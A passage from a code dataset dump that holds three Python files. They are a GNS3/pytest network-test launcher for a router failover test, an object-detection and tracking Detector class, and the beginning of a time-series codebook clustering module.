SSV_auto_BM10_wan_lte\nCfg_bm10.console.print(\"Стартует настройка лабы в gns3\",style='info')\ntime.sleep(5)\nprint(current_lab.start_nodes_from_project())\nCfg_bm10.console.print(\"Стартует сброс конфига DUT перед настройкой под тест\\n\" ,style='info')\ntime.sleep(5)\nwith open(\"../command_cfg/value_bm10.yaml\")as f:\n temp = yaml.safe_load(f)\n for t in temp:\n device = dict(t)\n r1 = Cfg_bm10(**device)\n with open(\"../command_cfg/commands_reset_cfg.yaml\") as f14: # команды сброса конфига\n commands_reset_cfg = yaml.safe_load(f14)\n print(r1.cfg_multihoming_failover(device,commands_reset_cfg)) # Сброс конфига \n Cfg_bm10.console.print(\"Стартует настройка DUT под тест 'Проверка поддержки Multihoming 3G/4G failover (mwan3)'\\n\" ,style='info')\n time.sleep(5)\n with open(\"../command_cfg/value_bm10.yaml\")as f:\n temp = yaml.safe_load(f)\n for t in temp:\n device = dict(t)\n r1 = Cfg_bm10(**device)\n with open(\"../command_cfg/commands_cfg_wan_lte.yaml\") as f15: # команды настройки \n commands_cfg_wan_lte = yaml.safe_load(f15)\n print(r1.cfg_multihoming_failover(device,commands_cfg_wan_lte)) # Настройка DUT под тесt \n\nCfg_bm10.console.print(\"Стартует настройка pytests под тест 'Проверка поддержки Multihoming 3G/4G failover (mwan3)'\\n\" ,style='info')\ntime.sleep(10)\npytest.main([\"-v\",\"-s\",\"--html=BULAT_TEST_BM10_Multihoming_failover.html\",\"../tests_all/test_check_wan_lte.py\"])\n","repo_name":"SergeyVolkoff/bm10_tasks","sub_path":"src/my_module/start_gns_tests/start_gns_test_multihom_failover.py","file_name":"start_gns_test_multihom_failover.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36014243753","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport cv2\nimport copy\nimport numpy as np\nfrom progress.bar import Bar\nimport time\nimport torch\nimport torch.nn.functional as F\nimport math\n\nfrom model.model import create_model, load_model\nfrom model.decode import generic_decode\nfrom model.utils import flip_tensor, flip_lr_off, flip_lr\nfrom utils.image import get_affine_transform, affine_transform\nfrom utils.image import draw_umich_gaussian, gaussian_radius\nfrom utils.post_process import generic_post_process\nfrom utils.debugger import Debugger\nfrom dataset.dataset_factory import get_dataset\nfrom model.nms_wrapper import nms\n\nclass InfLoss(torch.nn.Module):\n def __init__(self):\n super(InfLoss, self).__init__()\n self.eps = 1e-9\n self.pool = torch.nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)\n # self.pool = torch.nn.MaxPool2d(3, stride=1, padding=1)\n self.mseloss = torch.nn.MSELoss(reduction='none')\n self.cos = torch.nn.CosineSimilarity(dim=0, eps=1e-6)\n\n def forward(self, pre_out, out):\n pre_hm = pre_out[\"hm\"]\n hm = out[\"hm\"]\n offset = out['tracking']\n\n p_0_y, p_0_x = torch.meshgrid(torch.arange(0, hm.shape[2]), torch.arange(0, hm.shape[3]))\n p_0_y, p_0_x = p_0_y.contiguous(), p_0_x.contiguous()\n p_0 = torch.stack((p_0_x, p_0_y), dim=0).unsqueeze(0).repeat(hm.shape[0], 1, 1, 1).to(hm.device)\n p_0 = p_0.clone() + offset\n # p_0[:, 0, :, :] = torch.clamp(p_0[:, 0, :, :], 0, hm.shape[3] - 1) # 这个操作会丢失梯度\n # p_0[:, 1, :, :] = torch.clamp(p_0[:, 1, :, :], 0, hm.shape[2] - 1)\n p_0 = p_0.permute(0, 2, 3, 1)\n p_0[:, :, :, 0] = p_0[:, :, :, 0] / ((p_0.shape[2] - 1) / 2) - 1\n p_0[:, :, :, 1] = p_0[:, :, :, 1] / ((p_0.shape[1] - 1) / 2) - 1\n hmf = torch.nn.functional.grid_sample(hm, p_0, mode='bilinear',\n padding_mode='border', align_corners=False)\n\n mask = (pre_hm == pre_hm.max(dim=1, keepdim=True)[0]).to(dtype=torch.int32)\n mask = torch.mul(mask, pre_hm)\n\n # zero = torch.zeros_like(mask)\n # mask = torch.where(mask < 0.3, zero, mask)\n\n mask = torch.sum(mask, dim=1, keepdim=True)\n pre_hm2 = torch.softmax(pre_out[\"hm\"]/2.0, dim=1)\n # loss_hm = self.l2_loss(hm[:,0,:,:], out[\"hm\"][:,0,:,:], mask)\n loss_hm1 = self.l2_loss(pre_hm[:,0,:,:], hmf[:,0,:,:], mask)\n # loss_hm2 = self.l2_loss(pre_hm2[:, 1, :, :], hmf[:, 1, :, :], mask)\n\n\n loss_wh = self.l2_loss(pre_out[\"wh\"], out[\"wh\"], mask)\n # loss_ltrb = 0.5 * self.l2_loss(pre_out[\"ltrb_amodal\"], out[\"ltrb_amodal\"], mask)\n loss_off = self.cos_loss(pre_out[\"tracking\"], out[\"tracking\"], mask)\n\n dist_pre = torch.norm(pre_out[\"tracking\"], dim=1)\n dist = torch.norm(out[\"tracking\"], dim=1)\n\n loss_off2 = self.l2_loss(dist_pre, dist, mask)\n loss = loss_hm1 + loss_wh + loss_off + loss_off2\n return loss\n\n\n def l2_loss(self, pre_out, out, mask):\n loss = self.mseloss(pre_out, out)\n loss = torch.sum(loss * mask)\n # loss = ((pre_out - out) ** 2 * mask) + self.eps\n # loss = torch.sum(loss) ** 0.5\n return loss\n\n def cos_loss(self, pre_out, out, mask):\n loss = mask * (1-self.cos(pre_out, out))\n return 0.5 * torch.sum(loss)\n\nclass Detector(object):\n def __init__(self, opt):\n if opt.gpus[0] >= 0:\n opt.device = torch.device('cuda')\n else:\n opt.device = torch.device('cpu')\n if opt.track_method == \"byte\":\n from utils.byteTracker import Tracker\n elif opt.track_method == \"sort\":\n from utils.sort import MCSortT as Tracker\n else:\n from utils.tracker import Tracker\n\n print('Creating model...')\n self.model = create_model(\n opt.arch, opt.heads, opt.head_conv, opt=opt)\n self.model = load_model(self.model, opt.load_model, opt)\n self.model = self.model.to(opt.device)\n self.model.eval()\n\n self.opt = opt\n self.trained_dataset = get_dataset(opt.dataset)\n self.mean = np.array(\n self.trained_dataset.mean, dtype=np.float32).reshape(1, 1, 3)\n self.std = np.array(\n self.trained_dataset.std, dtype=np.float32).reshape(1, 1, 3)\n self.pause = not opt.no_pause\n self.rest_focal_length = self.trained_dataset.rest_focal_length \\\n if self.opt.test_focal_length < 0 else self.opt.test_focal_length\n self.flip_idx = self.trained_dataset.flip_idx\n self.cnt = 0\n self.pre_images = None\n self.pre_image_ori = None\n self.tracker = Tracker(opt)\n self.leiji_htmap = None\n self.debugger = Debugger(opt=opt, dataset=self.trained_dataset)\n if self.opt.inference_train:\n self.optimizer = torch.optim.Adam(self.model.parameters(), opt.lr)\n self.loss = InfLoss()\n self.pre_output = None\n\n def reset(self):\n self.cnt = 0\n self.pre_images = None\n self.pre_image_ori = None\n self.leiji_htmap = None\n self.tracker.reset()\n\n def reset_tracking(self):\n self.tracker.reset()\n self.pre_images = None\n self.pre_image_ori = None\n self.leiji_htmap = None\n\n def run(self, image_or_path_or_tensor, meta={}, f_rst=[], other_bbox=[], cnt=0):\n load_time, pre_time, net_time, dec_time, post_time = 0, 0, 0, 0, 0\n merge_time, track_time, tot_time, display_time = 0, 0, 0, 0\n self.debugger.clear()\n start_time = time.time()\n\n # read image\n pre_processed = False\n if isinstance(image_or_path_or_tensor, np.ndarray):\n image = image_or_path_or_tensor\n elif type(image_or_path_or_tensor) == type(''):\n image = cv2.imread(image_or_path_or_tensor)\n else:\n image = image_or_path_or_tensor['image'][0].numpy()\n pre_processed_images = image_or_path_or_tensor\n pre_processed = True\n\n loaded_time = time.time()\n load_time += (loaded_time - start_time)\n\n detections = []\n\n # for multi-scale testing\n for scale in self.opt.test_scales:\n scale_start_time = time.time()\n if not pre_processed:\n # not prefetch testing or demo\n images, meta = self.pre_process(image, scale, meta)\n else:\n # prefetch testing\n images = pre_processed_images['images'][scale][0]\n meta = pre_processed_images['meta'][scale]\n meta = {k: v.numpy()[0] for k, v in meta.items()}\n if 'pre_dets' in pre_processed_images['meta']:\n meta['pre_dets'] = pre_processed_images['meta']['pre_dets']\n if 'cur_dets' in pre_processed_images['meta']:\n meta['cur_dets'] = pre_processed_images['meta']['cur_dets']\n\n images = images.to(self.opt.device, non_blocking=self.opt.non_block_test)\n\n # initializing tracker\n pre_hms, pre_inds = None, None\n if self.opt.tracking:\n # initialize the first frame\n if self.pre_images is None:\n print('Initialize tracking!')\n self.pre_images = images\n self.tracker.init_track(\n meta['pre_dets'] if 'pre_dets' in meta else [])\n\n if self.opt.pre_hm:\n # render input heatmap from tracker status\n # pre_inds is not used in the current version.\n # We used pre_inds for learning an offset from previous image to\n # the current image.\n if self.opt.leiji_test:\n pre_dets, pre_hms, pre_inds = self._get_additional_inputs(\n self.tracker.tracks, meta, with_hm=not self.opt.zero_pre_hm, other_bbox=other_bbox)\n else:\n pre_hms, pre_inds = self._get_additional_inputs(\n self.tracker.tracks, meta, with_hm=not self.opt.zero_pre_hm, other_bbox=other_bbox)\n\n pre_process_time = time.time()\n pre_time += pre_process_time - scale_start_time\n\n # run the network\n # output: the output feature maps, only used for visualizing\n # dets: output tensors after extracting peaks\n if self.opt.leiji_test:\n output, dets, forward_time = self.process(\n images, self.pre_images, pre_hms, pre_inds, return_time=True, pre_dets=pre_dets)\n else:\n output, dets, forward_time = self.process(\n images, self.pre_images, pre_hms, pre_inds, return_time=True)\n if self.opt.inference_train and self.pre_output is None:\n for key in output:\n output[key] = output[key].detach()\n self.pre_output = output\n elif self.opt.inference_train:\n loss = self.loss(self.pre_output, output)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n for key in output:\n output[key] = output[key].detach()\n self.pre_output = output\n net_time += forward_time - pre_process_time\n decode_time = time.time()\n dec_time += decode_time - forward_time\n\n # convert the cropped and 4x downsampled output coordinate system\n # back to the input image coordinate system\n result = self.post_process(dets, meta, scale)\n post_process_time = time.time()\n post_time += post_process_time - decode_time\n\n\n detections.append(result)\n if self.opt.debug >= 1:\n self.debug(\n self.debugger, images, result, output, scale,\n pre_images=self.pre_images if not self.opt.no_pre_img else None,\n pre_hms=pre_hms)\n\n # merge multi-scale testing results\n results = self.merge_outputs(detections)\n if self.opt.give_first_gt and len(f_rst) != 0:\n results = f_rst\n if self.opt.give_sot_gt and cnt == 1:\n for i in range(len(results)):\n if results[i]['score'] > self.opt.track_thresh:\n results[i]['score'] = 1\n\n torch.cuda.synchronize()\n end_time = time.time()\n merge_time += end_time - post_process_time\n\n if self.opt.tracking:\n # public detection mode in MOT challenge\n public_det = meta['cur_dets'] if self.opt.public_det else None\n # add tracking id to results\n results = self.tracker.step(results, public_det)\n self.pre_images = images\n\n tracking_time = time.time()\n track_time += tracking_time - end_time\n tot_time += tracking_time - start_time\n\n if self.opt.debug >= 1:\n self.show_results(self.debugger, image, results)\n self.cnt += 1\n\n show_results_time = time.time()\n display_time += show_results_time - end_time\n\n # return results and run time\n ret = {'results': results, 'tot': tot_time, 'load': load_time,\n 'pre': pre_time, 'net': net_time, 'dec': dec_time,\n 'post': post_time, 'merge': merge_time, 'track': track_time,\n 'display': display_time}\n if self.opt.save_video or self.opt.mysave_imgs:\n try:\n # return debug image for saving video\n ret.update({'generic': self.debugger.imgs['generic']})\n except:\n pass\n return ret\n\n def _transform_scale(self, image, scale=1):\n '''\n Prepare input image in different testing modes.\n Currently support: fix short size/ center crop to a fixed size/\n keep original resolution but pad to a multiplication of 32\n '''\n height, width = image.shape[0:2]\n new_height = int(height * scale)\n new_width = int(width * scale)\n if self.opt.fix_short > 0:\n if height < width:\n inp_height = self.opt.fix_short\n inp_width = (int(width / height * self.opt.fix_short) + 63) // 64 * 64\n else:\n inp_height = (int(height / width * self.opt.fix_short) + 63) // 64 * 64\n inp_width = self.opt.fix_short\n c = np.array([width / 2, height / 2], dtype=np.float32)\n s = np.array([width, height], dtype=np.float32)\n elif self.opt.fix_res:\n inp_height, inp_width = self.opt.input_h, self.opt.input_w\n c = np.array([new_width / 2., new_height / 2.], dtype=np.float32)\n s = max(height, width) * 1.0\n # s = np.array([inp_width, inp_height], dtype=np.float32)\n else:\n inp_height = (new_height | self.opt.pad) + 1\n inp_width = (new_width | self.opt.pad) + 1\n c = np.array([new_width // 2, new_height // 2], dtype=np.float32)\n s = np.array([inp_width, inp_height], dtype=np.float32)\n resized_image = cv2.resize(image, (new_width, new_height))\n return resized_image, c, s, inp_width, inp_height, height, width\n\n def pre_process(self, image, scale, input_meta={}):\n '''\n Crop, resize, and normalize image. Gather meta data for post processing\n and tracking.\n '''\n resized_image, c, s, inp_width, inp_height, height, width = \\\n self._transform_scale(image)\n trans_input = get_affine_transform(c, s, 0, [inp_width, inp_height])\n out_height = inp_height // self.opt.down_ratio\n out_width = inp_width // self.opt.down_ratio\n trans_output = get_affine_transform(c, s, 0, [out_width, out_height])\n\n inp_image = cv2.warpAffine(\n resized_image, trans_input, (inp_width, inp_height),\n flags=cv2.INTER_LINEAR)\n inp_image = ((inp_image / 255. - self.mean) / self.std).astype(np.float32)\n\n images = inp_image.transpose(2, 0, 1).reshape(1, 3, inp_height, inp_width)\n if self.opt.flip_test:\n images = np.concatenate((images, images[:, :, :, ::-1]), axis=0)\n images = torch.from_numpy(images)\n meta = {'calib': np.array(input_meta['calib'], dtype=np.float32) \\\n if 'calib' in input_meta else \\\n self._get_default_calib(width, height)}\n meta.update({'c': c, 's': s, 'height': height, 'width': width,\n 'out_height': out_height, 'out_width': out_width,\n 'inp_height': inp_height, 'inp_width': inp_width,\n 'trans_input': trans_input, 'trans_output': trans_output})\n if 'pre_dets' in input_meta:\n meta['pre_dets'] = input_meta['pre_dets']\n if 'cur_dets' in input_meta:\n meta['cur_dets'] = input_meta['cur_dets']\n return images, meta\n\n def _trans_bbox(self, bbox, trans, width, height):\n '''\n Transform bounding boxes according to image crop.\n '''\n bbox = np.array(copy.deepcopy(bbox), dtype=np.float32)\n bbox[:2] = affine_transform(bbox[:2], trans)\n bbox[2:] = affine_transform(bbox[2:], trans)\n bbox[[0, 2]] = np.clip(bbox[[0, 2]], 0, width - 1)\n bbox[[1, 3]] = np.clip(bbox[[1, 3]], 0, height - 1)\n return bbox\n\n def _get_additional_inputs(self, dets, meta, with_hm=True, other_bbox=None):\n '''\n Render input heatmap from previous trackings.\n '''\n trans_input, trans_output = meta['trans_input'], meta['trans_output']\n inp_width, inp_height = meta['inp_width'], meta['inp_height']\n out_width, out_height = meta['out_width'], meta['out_height']\n input_hm = np.zeros((1, inp_height, inp_width), dtype=np.float32)\n pre_detm = np.zeros((2, inp_height, inp_width), dtype=np.float32)\n\n output_inds = []\n for det in dets:\n if det['score'] < self.opt.pre_thresh or det['active'] == 0:\n continue\n bbox = self._trans_bbox(det['bbox'], trans_input, inp_width, inp_height)\n bbox_out = self._trans_bbox(\n det['bbox'], trans_output, out_width, out_height)\n h, w = bbox[3] - bbox[1], bbox[2] - bbox[0]\n if (h > 0 and w > 0):\n radius = gaussian_radius((math.ceil(h), math.ceil(w)))\n if self.opt.big_radius:\n radius = max(radius, min(math.ceil(h), math.ceil(w)) / 2.0)\n radius = max(0, int(radius))\n ct = np.array(\n [(bbox[0] + bbox[2]) / 2, (bbox[1] + bbox[3]) / 2], dtype=np.float32)\n ct_int = ct.astype(np.int32)\n if with_hm:\n draw_umich_gaussian(input_hm[0], ct_int, radius)\n if self.opt.leiji_test:\n draw_umich_gaussian(pre_detm[det['class']-1], ct_int, radius)\n ct_out = np.array(\n [(bbox_out[0] + bbox_out[2]) / 2,\n (bbox_out[1] + bbox_out[3]) / 2], dtype=np.int32)\n output_inds.append(ct_out[1] * out_width + ct_out[0])\n for det in other_bbox:\n bbox = self._trans_bbox(det['bbox'], trans_input, inp_width, inp_height)\n bbox_out = self._trans_bbox(\n det['bbox'], trans_output, out_width, out_height)\n h, w = bbox[3] - bbox[1], bbox[2] - bbox[0]\n if (h > 0 and w > 0):\n radius = gaussian_radius((math.ceil(h), math.ceil(w)))\n if self.opt.big_radius:\n radius = max(radius, min(math.ceil(h), math.ceil(w)) / 2.0)\n radius = max(0, int(radius))\n ct = np.array(\n [(bbox[0] + bbox[2]) / 2, (bbox[1] + bbox[3]) / 2], dtype=np.float32)\n ct_int = ct.astype(np.int32)\n if with_hm:\n draw_umich_gaussian(input_hm[0], ct_int, radius)\n # if self.opt.leiji_test:\n # draw_umich_gaussian(pre_detm[det['class']-1], ct_int, radius)\n ct_out = np.array(\n [(bbox_out[0] + bbox_out[2]) / 2,\n (bbox_out[1] + bbox_out[3]) / 2], dtype=np.int32)\n output_inds.append(ct_out[1] * out_width + ct_out[0])\n if with_hm:\n input_hm = input_hm[np.newaxis]\n pre_detm = pre_detm[np.newaxis]\n if self.opt.flip_test:\n input_hm = np.concatenate((input_hm, input_hm[:, :, :, ::-1]), axis=0)\n pre_detm = np.concatenate((pre_detm, pre_detm[:, :, :, ::-1]), axis=0)\n input_hm = torch.from_numpy(input_hm).to(self.opt.device)\n pre_detm = torch.from_numpy(pre_detm).to(self.opt.device)\n pre_detm = F.interpolate(pre_detm, scale_factor=0.25)\n output_inds = np.array(output_inds, np.int64).reshape(1, -1)\n output_inds = torch.from_numpy(output_inds).to(self.opt.device)\n if self.opt.leiji_test:\n return pre_detm, input_hm, output_inds\n return input_hm, output_inds\n\n def _get_default_calib(self, width, height):\n calib = np.array([[self.rest_focal_length, 0, width / 2, 0],\n [0, self.rest_focal_length, height / 2, 0],\n [0, 0, 1, 0]])\n return calib\n\n def _sigmoid_output(self, output):\n if 'hm' in output:\n output['hm'] = output['hm'].sigmoid_()\n if 'hm_hp' in output:\n output['hm_hp'] = output['hm_hp'].sigmoid_()\n if 'dep' in output:\n output['dep'] = 1. / (output['dep'].sigmoid() + 1e-6) - 1.\n output['dep'] *= self.opt.depth_scale\n return output\n\n def _flip_output(self, output):\n average_flips = ['hm', 'wh', 'dep', 'dim']\n neg_average_flips = ['amodel_offset']\n single_flips = ['ltrb', 'nuscenes_att', 'velocity', 'ltrb_amodal', 'reg',\n 'hp_offset', 'rot', 'tracking', 'pre_hm']\n for head in output:\n if head in average_flips:\n output[head] = (output[head][0:1] + flip_tensor(output[head][1:2])) / 2\n if head in neg_average_flips:\n flipped_tensor = flip_tensor(output[head][1:2])\n flipped_tensor[:, 0::2] *= -1\n output[head] = (output[head][0:1] + flipped_tensor) / 2\n if head in single_flips:\n output[head] = output[head][0:1]\n if head == 'hps':\n output['hps'] = (output['hps'][0:1] +\n flip_lr_off(output['hps'][1:2], self.flip_idx)) / 2\n if head == 'hm_hp':\n output['hm_hp'] = (output['hm_hp'][0:1] + \\\n flip_lr(output['hm_hp'][1:2], self.flip_idx)) / 2\n\n return output\n\n def process(self, images, pre_images=None, pre_hms=None,\n pre_inds=None, return_time=False, pre_dets=None):\n if self.opt.inference_train:\n torch.cuda.synchronize()\n\n output = self.model(images, pre_images, pre_hms)[-1]\n output = self._sigmoid_output(output)\n output.update({'pre_inds': pre_inds})\n if self.opt.flip_test:\n output = self._flip_output(output)\n torch.cuda.synchronize()\n forward_time = time.time()\n if self.opt.atten_method != \"none\":\n if self.opt.leiji_test:\n if self.leiji_htmap is not None:\n self.leiji_htmap = 0.5 * pre_dets + 0.5 * self.leiji_htmap\n dets, self.model.heat_att, self.leiji_htmap = generic_decode(output, K=self.opt.K,\n opt=self.opt,\n leiji_htmap=self.leiji_htmap)\n elif self.opt.auto_thresh:\n dets, self.model.heat_att, self.opt.track_thresh = generic_decode(output, K=self.opt.K,\n opt=self.opt)\n self.opt.out_thresh = self.opt.track_thresh\n self.opt.new_thresh = self.opt.track_thresh\n else:\n dets, self.model.heat_att, self.model.offset = generic_decode(output, K=self.opt.K, opt=self.opt)\n else:\n dets = generic_decode(output, K=self.opt.K, opt=self.opt)\n torch.cuda.synchronize()\n for k in dets:\n dets[k] = dets[k].detach().cpu().numpy()\n if return_time:\n return output, dets, forward_time\n else:\n return output, dets\n else:\n with torch.no_grad():\n torch.cuda.synchronize()\n\n output = self.model(images, pre_images, pre_hms)[-1]\n output = self._sigmoid_output(output)\n output.update({'pre_inds': pre_inds})\n if self.opt.flip_test:\n output = self._flip_output(output)\n torch.cuda.synchronize()\n forward_time = time.time()\n if self.opt.atten_method != \"none\":\n if self.opt.leiji_test:\n if self.leiji_htmap is not None:\n self.leiji_htmap = 0.5*pre_dets + 0.5*self.leiji_htmap\n dets, self.model.heat_att, self.leiji_htmap = generic_decode(output, K=self.opt.K,\n opt=self.opt, leiji_htmap=self.leiji_htmap)\n elif self.opt.auto_thresh:\n dets, self.model.heat_att, self.opt.track_thresh = generic_decode(output, K=self.opt.K, opt=self.opt)\n self.opt.out_thresh = self.opt.track_thresh\n self.opt.new_thresh = self.opt.track_thresh\n else:\n dets, self.model.heat_att, self.model.offset = generic_decode(output, K=self.opt.K, opt=self.opt)\n else:\n dets = generic_decode(output, K=self.opt.K, opt=self.opt)\n torch.cuda.synchronize()\n for k in dets:\n dets[k] = dets[k].detach().cpu().numpy()\n if return_time:\n return output, dets, forward_time\n else:\n return output, dets\n\n def apply_nms(self, all_boxes, thresh):\n \"\"\"Apply non-maximum suppression to all predicted boxes output by the\n test_net method.\n \"\"\"\n num_classes = len(all_boxes)\n num_images = 1 # TODO: demo only support 1 batchsize now\n nms_boxes = []\n for cls_ind in range(num_classes):\n temp_boxes = np.array(all_boxes[cls_ind])\n for im_ind in range(num_images):\n boxes = []\n for box in all_boxes[cls_ind]:\n box_list = np.append(box[\"bbox\"], box[\"score\"])\n boxes.append(box_list)\n dets = np.array(boxes, dtype=np.float32)\n if len(dets) == 0:\n continue\n # print('dets', dets)\n x1 = dets[:, 0]\n y1 = dets[:, 1]\n x2 = dets[:, 2]\n y2 = dets[:, 3]\n scores = dets[:, 4]\n inds = np.where((x2 > x1) & (y2 > y1))[0]\n dets = dets[inds, :]\n if dets == []:\n continue\n\n keep = nms(dets, thresh)\n if len(keep) == 0:\n continue\n nms_boxes.append(temp_boxes[keep].tolist())\n return nms_boxes\n\n\n def post_process(self, dets, meta, scale=1):\n dets = generic_post_process(\n self.opt, dets, [meta['c']], [meta['s']],\n meta['out_height'], meta['out_width'], self.opt.num_classes,\n [meta['calib']], meta['height'], meta['width'])\n self.this_calib = meta['calib']\n\n if scale != 1:\n for i in range(len(dets[0])):\n for k in ['bbox', 'hps']:\n if k in dets[0][i]:\n dets[0][i][k] = (np.array(\n dets[0][i][k], np.float32) / scale).tolist()\n if self.opt.nms:\n dets = self.apply_nms(dets, self.opt.nms_thresh)\n if len(dets) == 0:\n return dets\n return dets[0]\n\n def merge_outputs(self, detections):\n assert len(self.opt.test_scales) == 1, 'multi_scale not supported!'\n results = []\n for i in range(len(detections[0])):\n if detections[0][i]['score'] > self.opt.out_thresh:\n results.append(detections[0][i])\n return results\n\n def debug(self, debugger, images, dets, output, scale=1,\n pre_images=None, pre_hms=None):\n img = images[0].detach().cpu().numpy().transpose(1, 2, 0)\n img = np.clip(((\n img * self.std + self.mean) * 255.), 0, 255).astype(np.uint8)\n pred = debugger.gen_colormap(output['hm'][0].detach().cpu().numpy())\n debugger.add_blend_img(img, pred, 'pred_hm')\n if 'hm_hp' in output:\n pred = debugger.gen_colormap_hp(\n output['hm_hp'][0].detach().cpu().numpy())\n debugger.add_blend_img(img, pred, 'pred_hmhp')\n\n if pre_images is not None:\n pre_img = pre_images[0].detach().cpu().numpy().transpose(1, 2, 0)\n pre_img = np.clip(((\n pre_img * self.std + self.mean) * 255.), 0, 255).astype(np.uint8)\n debugger.add_img(pre_img, 'pre_img')\n if pre_hms is not None:\n pre_hm = debugger.gen_colormap(\n pre_hms[0].detach().cpu().numpy())\n debugger.add_blend_img(pre_img, pre_hm, 'pre_hm')\n\n def show_results(self, debugger, image, results):\n debugger.add_img(image, img_id='generic')\n if self.opt.tracking:\n debugger.add_img(self.pre_image_ori if self.pre_image_ori is not None else image,\n img_id='previous')\n self.pre_image_ori = image\n\n for j in range(len(results)):\n if results[j]['score'] > self.opt.vis_thresh:\n if 'active' in results[j] and results[j]['active'] == 0:\n continue\n item = results[j]\n if ('bbox' in item):\n sc = item['score'] if self.opt.demo == '' or \\\n not ('tracking_id' in item) else item['tracking_id']\n sc = item['tracking_id'] if self.opt.show_track_color else sc\n\n debugger.add_coco_bbox(\n item['bbox'], item['class'] - 1, sc, img_id='generic')\n\n if 'tracking' in item:\n debugger.add_arrow(item['ct'], item['tracking'], img_id='generic')\n\n tracking_id = item['tracking_id'] if 'tracking_id' in item else -1\n if 'tracking_id' in item and self.opt.demo == '' and \\\n not self.opt.show_track_color:\n debugger.add_tracking_id(\n item['ct'], item['tracking_id'], img_id='generic')\n\n if (item['class'] in [1, 2]) and 'hps' in item:\n debugger.add_coco_hp(item['hps'], tracking_id=tracking_id,\n img_id='generic')\n\n if len(results) > 0 and \\\n 'dep' in results[0] and 'alpha' in results[0] and 'dim' in results[0]:\n debugger.add_3d_detection(\n image if not self.opt.qualitative else cv2.resize(\n debugger.imgs['pred_hm'], (image.shape[1], image.shape[0])),\n False, results, self.this_calib,\n vis_thresh=self.opt.vis_thresh, img_id='ddd_pred')\n debugger.add_bird_view(\n results, vis_thresh=self.opt.vis_thresh,\n img_id='bird_pred', cnt=self.cnt)\n if self.opt.show_track_color and self.opt.debug == 4:\n del debugger.imgs['generic'], debugger.imgs['bird_pred']\n if 'ddd_pred' in debugger.imgs:\n debugger.imgs['generic'] = debugger.imgs['ddd_pred']\n if self.opt.debug == 4:\n debugger.save_all_imgs(self.opt.debug_dir, prefix='{}'.format(self.cnt))\n elif self.opt.debug == 1:\n pass\n else:\n debugger.show_all_imgs(pause=self.pause)\n\n\n","repo_name":"LingyvKong/CFTracker","sub_path":"src/lib/detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":30912,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"28338006019","text":"from glob import glob\nimport json, datetime, time, os, random, platform, sys\n\nimport scipy\nfrom tslearn import metrics as tsm\nfrom matplotlib import colors\n\nfrom scipy import ndimage, signal\nimport scipy.spatial.distance as distance\nfrom scipy.spatial.distance import euclidean, pdist, squareform, cdist\nfrom scipy.cluster import hierarchy\nfrom scipy.cluster.hierarchy import dendrogram, linkage, fcluster\nfrom scipy.ndimage.filters import gaussian_filter1d\n\nimport numpy as np\nfrom numpy.lib.stride_tricks import as_strided\nnp.set_printoptions(precision=3, suppress=True) # suppress scientific float notation\n\nfrom eluent.dataset import get_file, mts2df, df2mts, MTS\nfrom eluent import visualization\nimport cmocean\n\nclass Codebook:\n \"\"\"Container class for a Codebook object. Must be constructed from an MTS Object. Contains methods for subsequence clustering and codeword extraction. \"\"\"\n def __init__(self, mts):\n self.mts = mts\n self.distilled = False\n self.extracted = False\n\n # Extracts all subsequences and performs hierarchical clustering\n def distill(self, cull_threshold):\n sss = self.mts.samples\n word_shape = self.mts.word_shape\n self.cull = cull_threshold\n\n # Sample using greedy k-centers clustering\n N = sss.shape[0]\n first_center = random.randint(0, N)\n first_center = N // 2\n seed = sss[first_center]\n code_sample = np.delete(sss, first_center, 0)\n\n # Construct distance metric\n dtw = make_multivariate_dtw(word_shape)\n\n self.centers = sample_kcenters(code_sample, [seed], dtw, cull_threshold)\n M = self.centers.shape[0]\n self.M = M\n print('Sampled M={} centers, {:.2f}%% of original N={} sequences'.format(M, (M / N) * 100, N))\n print(\"--------------------------------------------------\")\n\n # Hierarchical clustering and pruning\n print('Hierarchical clustering...', end='\\r')\n self.linkage_matrix = linkage(self.centers, method='complete', metric=dtw)\n print(\"Generated hierarchical cluster\")\n self.distilled = True\n\n # Extracts K distinctive codewords from the codebook by pruning the dendrogram at the K-th level\n def extract(self, K):\n if not self.distilled:\n print(\"Must call Codebook.distill() before extract\")\n return\n\n self.K = K\n word_shape = self.mts.word_shape\n dtw = make_multivariate_dtw(word_shape)\n\n clusters = fcluster(self.linkage_matrix, K, criterion='maxclust')\n\n # Codeword extraction\n codebook = {}\n for i in range(len(clusters)):\n cluster_id = clusters[i]\n if not cluster_id in codebook:\n codebook[cluster_id] = []\n codebook[cluster_id].append(self.centers[i])\n\n\n for i in range(1, K+1):\n print(\"Codeword {}: Cluster size={}\".format(i, len(codebook[i])))\n\n # Computer centroid\n for k in codebook:\n codeset = np.array(codebook[k])\n dist = np.sum(squareform(distance.pdist(codeset, metric=dtw)), 0)\n clustroid = np.argmin(dist)\n codebook[k] = codeset[clustroid]\n\n self.codebook = codebook\n self.extracted = True\n\n self.reorder_colors = lambda x: x\n return codebook\n\n # Plots a dendrogram\n def visualize_linkage(self, d=0):\n if not self.distilled:\n print(\"Must call Codebook.distilled() before visualize_linkage\")\n\n return visualization.fancy_dendrogram(self.linkage_matrix, truncate_mode='lastp',\n p=12,\n leaf_rotation=90.,\n leaf_font_size=12.,\n show_contracted=True,\n annotate_above= 0.4, \n max_d=d)\n\n # Plots the codebook\n def visualize(self):\n if not self.extracted:\n print(\"Must call Codebook.extract() before visualize_codewords\")\n\n return visualization.vis_codewords(self)\n\n # Generates a Chromatogram object by applying the Codebook to the MTS matrix\n def apply(self):\n assert self.extracted, \"Must call Codebook.extract() before applying codebook\"\n \n return Chromatogram(self.mts, self)\n\nclass Chromatogram:\n \"\"\"Container class for a Chromatogram object. Contains methods for visualizing chromatograms and computing statistics.\"\"\"\n def __init__(self, mts, codebook):\n self.mts = mts\n self.codebook = codebook\n self.users = self.mts.users\n self.rendered = False\n\n # Renders the chromatogram by computing the closest codeword to each L-sequence in the original MTS matrix.\n # - smoothing_window: controls the window size for codeword smoothing\n # - segment_on: determines how to cluster the user (see segment_users method)\n # - reorder_colors: whether the most salient colors should be reassigned to codewords with the shortest duration\n def render(self, smoothing_window=0, segment_on='freqs', 